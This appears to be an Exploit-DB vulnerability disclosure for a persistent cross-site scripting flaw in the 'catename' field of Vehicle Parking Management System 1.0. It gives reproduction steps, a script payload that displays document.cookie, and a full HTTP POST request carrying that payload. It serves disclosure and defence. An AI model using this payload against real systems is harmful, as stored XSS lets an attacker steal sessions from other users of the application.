Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)

vendor:

Vehicle Parking Management System

by:

Tushar Vaidya

8.8

CVSS

HIGH

Persistent Cross-Site Scripting (XSS)

CWE

Product Name: Vehicle Parking Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:vehicle_parking_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu

2021

Vehicle Parking Management System 1.0 – ‘catename’ Persistent Cross-Site Scripting (XSS)

A persistent cross-site scripting (XSS) vulnerability exists in Vehicle Parking Management System 1.0, which allows an attacker to inject malicious JavaScript code into the 'catename' parameter of the 'addcategory.php' page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious payload to the vulnerable page. The malicious payload will be executed in the browser of the victim when they view the page.

Mitigation:

The application should validate user input and encode output to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
# Date: 2021-02-25
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
# Version: v1.0
# Tested on: Ubuntu


*Steps to Reproduce:*
1) Login with Admin Credentials and click on the '*Manage category*' button.
2) Click on the '*Add Categories*'  button.
3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
4) Now add the following payload input field of *Category *as a parameter name is *catename*

Payload:  ba1man"><script>alert(document.cookie)</script>

4) Click On Save
5) Now go to '*Manage category > View Categories*'
5) XSS payload is triggered.

*proof-of-concept:*
1) Request:

POST /lagos_parker/parker/addcategory.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lagos_parker/parker/addcategory.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Connection: close
Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
Upgrade-Insecure-Requests: 1
catename=ba1man"><script>alert(document.cookie)</script>&submit=